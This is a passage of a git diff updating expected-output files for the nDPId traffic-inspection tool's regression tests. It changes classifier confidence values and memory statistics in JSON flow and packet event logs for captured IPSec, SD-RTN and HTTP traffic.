{"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1649336897978,"flow_last_seen":1649337802273,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":4212,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649337802273,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"199.190.44.135","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649336965165,"flow_last_seen":1649336968493,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":3510,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649337802273,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.180","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 
-00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649336960165,"flow_last_seen":1649336960225,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3290,"flow_avg_l4_payload_len":219,"midstream":0,"thread_ts_msec":1649337802273,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649336894950,"flow_last_seen":1649336897978,"flow_idle_time":200000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":3525,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1649337802273,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"103.104.168.244","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 
-00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649336954948,"flow_last_seen":1649336955151,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3288,"flow_avg_l4_payload_len":219,"midstream":0,"thread_ts_msec":1649337802273,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.224","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649336870173,"flow_last_seen":1649336870432,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3490,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1649337802273,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.223","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 
-00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649336879948,"flow_last_seen":1649336882923,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":4284,"flow_avg_l4_payload_len":285,"midstream":0,"thread_ts_msec":1649337802273,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"202.226.25.166","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1649336960225,"flow_last_seen":1649336960225,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":498,"flow_tot_l4_payload_len":4167,"flow_avg_l4_payload_len":416,"midstream":0,"thread_ts_msec":1649337802273,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.223","src_port":55094,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1649336897978,"flow_last_seen":1649337802273,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":4212,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649337802273,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"199.190.44.135","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649336965165,"flow_last_seen":1649336968493,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":3510,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649337802273,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.180","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649336960165,"flow_last_seen":1649336960225,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3290,"flow_avg_l4_payload_len":219,"midstream":0,"thread_ts_msec":1649337802273,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649336894950,"flow_last_seen":1649336897978,"flow_idle_time":200000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":3525,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1649337802273,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"103.104.168.244","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649336954948,"flow_last_seen":1649336955151,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3288,"flow_avg_l4_payload_len":219,"midstream":0,"thread_ts_msec":1649337802273,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.224","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649336870173,"flow_last_seen":1649336870432,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3490,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1649337802273,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.223","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649336879948,"flow_last_seen":1649336882923,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":4284,"flow_avg_l4_payload_len":285,"midstream":0,"thread_ts_msec":1649337802273,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"202.226.25.166","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":403,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","packets-captured":403,"packets-processed":403,"total-skipped-flows":0,"total-l4-payload-len":95439,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":26,"total-detection-updates":0,"total-updates":1,"current-active-flows":0,"total-active-flows":26,"total-idle-flows":26,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":164,"global_ts_msec":1649337802273} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 403/403 @@ -170,9 +170,9 @@ ~~ total active/idle flows...: 26/26 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5907630 bytes -~~ total memory freed........: 5907630 bytes -~~ total allocations/frees...: 118617/118617 +~~ total memory allocated....: 6041264 bytes +~~ total memory freed........: 6041264 bytes +~~ total allocations/frees...: 121379/121379 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 468 chars ~~ json string max len.......: 768 chars 
diff --git a/test/results/ah.pcapng.out b/test/results/ah.pcapng.out
index ea0603252..fbe8db828 100644
--- a/test/results/ah.pcapng.out
+++ b/test/results/ah.pcapng.out
@@ -2,15 +2,15 @@ 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ah.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1587338929051} 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ah.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587338929051,"flow_last_seen":1587338929051,"flow_idle_time":200000,"flow_min_l4_payload_len":358,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":358,"midstream":0,"thread_ts_msec":1587338929051,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","src_port":500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00912{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ah.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1587338929051,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":400,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":400,"pkt_l4_len":366,"thread_ts_msec":1587338929051,"pkt":"qrvMAAMQqrvMAAIQCABFwAGCAJ4AAP8RngIKAgMCCgMEBAH0AfQBbieYHBhp9tKboMwAAAAAAAAAACEgIggAAAAAAAABZiIAADAAAAAsAQEABAMAAAwBAAAMgA4BAAMAAAgCAAAGAwAACAMAAA0AAAAIBAAAFCgAAGgAFAAAop90y3jHmNMWVGIbNRerOVFzMP5JoRLlIVT+uGcaHcUDAfZ9agub4v3ifShq9iAjKtd\/XZoIX76e0SSPXecxSXzgS1HJOpsJtzfXg96dFLBFkvBpXPHiUb1T29i2BXzdKwAAJGy943MOgVw+17TTE3RGnNSeH1Br3ZzttJxYzZbae2KMKwAAF0NJU0NPLURFTEVURS1SRUFTT04rAAATQ0lTQ09WUE4tUkVWLTAyKwAAF0NJU0NPLURZTkFNSUMtUk9VVEUpAAAVRkxFWFZQTi1TVVBQT1JURUQpAAAcAABABCNvuAsA4SMheroNDIs0se1c2REJAAAAHAAAQAUSA9ZB8IS5r14gXhydhU2hTnWD2w=="} -00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ah.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587338929051,"flow_last_seen":1587338929051,"flow_idle_time":200000,"flow_min_l4_payload_len":358,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":358,"midstream":0,"thread_ts_msec":1587338929051,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","src_port":500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
+00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ah.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587338929051,"flow_last_seen":1587338929051,"flow_idle_time":200000,"flow_min_l4_payload_len":358,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":358,"midstream":0,"thread_ts_msec":1587338929051,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","src_port":500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00912{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ah.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1587338929058,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":400,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":400,"pkt_l4_len":366,"thread_ts_msec":1587338929058,"pkt":"qrvMAAIQqrvMAAMQCABFwAGCAJUAAP4RnwsKAwQECgIDAgH0AfQBbpMTHBhp9tKboMxXKornVXrZ7CEgIiAAAAAAAAABZiIAADAAAAAsAQEABAMAAAwBAAAMgA4BAAMAAAgCAAAGAwAACAMAAA0AAAAIBAAAFCgAAGgAFAAA3\/NdSHtjsuV9lwu7r3PG72M7PTs97w7W7XWrjiKy83GusQxHzpqo7SyUw6CdLyZlI6GlvRXFFZQ37DazOAEOXk0lG8t6jBRQFWWSD0tGhA1+E9jC73KPJu4MHQQrp0dlKwAAJMsSzp7FMBmLLwjNerQt3fDJwl4MLQ75rKamBuCoU9JFKwAAF0NJU0NPLURFTEVURS1SRUFTT04rAAATQ0lTQ09WUE4tUkVWLTAyKwAAF0NJU0NPLURZTkFNSUMtUk9VVEUpAAAVRkxFWFZQTi1TVVBQT1JURUQpAAAcAABABLSbKQHg76sTvA2s+iqtHO17zN+1AAAAHAAAQAXEF0AGtBGCSamsYpymSQTNLPEeng=="} 
00876{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ah.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1587338929067,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1587338929067,"pkt":"qrvMAAMQqrvMAAIQCABFwAFkAJ8AAP8Rnh8KAgMCCgMEBAH0AfQBUGzjHBhp9tKboMxXKornVXrZ7C4gIwgAAAABAAABSCsAASyBDTrs2Pxvpq7JTnlskHs3y\/lcA4L2kN8fdzJ8fVpYrZTlpuZPtrueSIpYdb+qQTDV2NvMTrxEqmRiytNcmsMUgiqFEXykJmS3P10k8AYBydJ7jb5c3eyLXb1Xq+36+2tgOS1TpUTMh9FvAJkjDZuy9dxuXzbWMy9Bia4cikOr17km8gYu1TAmwh\/g9n514pWnNcM6640AaIdVe6A4QpHHMQEvu1nLtY9OQj13tjKJXcfVHJL\/tVSVAMUi+K5X3aJOMKyYeZBbVZrNRi8RFtvjXQRLRPFCTuUeShJfFRDznRua5syxQXi+6dd5t3q5F806SIRRAk975bBTw\/\/FxVkvix8dHReWdnoNuDuSDSHK8wVobcjOktkOzVZUVL8vxTTf4rHWn7VO+g=="} 00535{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"ah.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587338931051,"flow_last_seen":1587338931051,"flow_idle_time":620000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1587338931051,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","l4_proto":51,"flow_datalink":1,"flow_max_packets":3} 00559{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"ah.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1587338931051,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1587338931051,"pkt":"qrvMAAMQqrvMAAIQCABFAAB8ABMAAP8zoDEKAgMCCgMEBAEEAABgSBb2AAAAAecyq6zhxgBG7sZB7QgAZwQABQABAAAAAAAUFyyrzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavN"} 
-00585{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"ah.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587338931051,"flow_last_seen":1587338931051,"flow_idle_time":620000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1587338931051,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","l4_proto":51,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00585{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"ah.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587338931051,"flow_last_seen":1587338931051,"flow_idle_time":620000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1587338931051,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","l4_proto":51,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00559{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"ah.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1587338931051,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1587338931051,"pkt":"qrvMAAIQqrvMAAMQCABFAAB8ABMAAP4zoTEKAwQECgIDAgEEAACvhoPvAAAAAQLuLdf7aFTxy+gQnAAAbwQABQABAAAAAAAUFyyrzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavN"} 
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"ah.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1587338929051,"flow_last_seen":1587338929075,"flow_idle_time":200000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":1324,"flow_avg_l4_payload_len":331,"midstream":0,"thread_ts_msec":1587338931051,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","src_port":500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00624{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"ah.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587338931051,"flow_last_seen":1587338931051,"flow_idle_time":620000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1587338931051,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","l4_proto":51,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"ah.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1587338929051,"flow_last_seen":1587338929075,"flow_idle_time":200000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":1324,"flow_avg_l4_payload_len":331,"midstream":0,"thread_ts_msec":1587338931051,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","src_port":500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
+00624{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"ah.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587338931051,"flow_last_seen":1587338931051,"flow_idle_time":620000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1587338931051,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","l4_proto":51,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00550{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6,"source":"ah.pcapng","alias":"nDPId-test","packets-captured":6,"packets-processed":6,"total-skipped-flows":0,"total-l4-payload-len":1532,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":14,"global_ts_msec":1587338931051} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 6/6 @@ -20,9 +20,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870677 bytes -~~ total memory freed........: 5870677 bytes -~~ total allocations/frees...: 118124/118124 +~~ total memory allocated....: 6004311 bytes +~~ total memory freed........: 6004311 bytes +~~ total allocations/frees...: 120886/120886 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 917 chars diff --git a/test/results/aimini-http.pcap.out b/test/results/aimini-http.pcap.out index 925d308ae..718b9ac70 100644 --- a/test/results/aimini-http.pcap.out 
+++ b/test/results/aimini-http.pcap.out 
@@ -4,26 +4,26 @@ 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614860229383,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229383,"pkt":"5kBKB+riApXG95NLCABFAAAwBPkAAIAGAAAKZQACCmYAAm9VAFCbu4XRAAAAAHACgAEU8QAAAgQFtAMDAQA="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614860229383,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229383,"pkt":"ApXG95WRWgXZu6TVCABFAAAwBPkAAH8GIgEKZQACCmYAAm9VAFCbu4XRAAAAAHACgAFeHQAAAgQFtAMDAQA="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614860229384,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229384,"pkt":"WgXZu6TVApXG95WRCABFAAAwBQQAAIAGAAAKZgACCmUAAgBQb1Wbu5n7m7uF0nASgAEU8QAAAgQFtAMDAQA="} -00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229383,"flow_last_seen":1614860229384,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":595,"flow_tot_l4_payload_len":595,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1614860229384,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28501,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
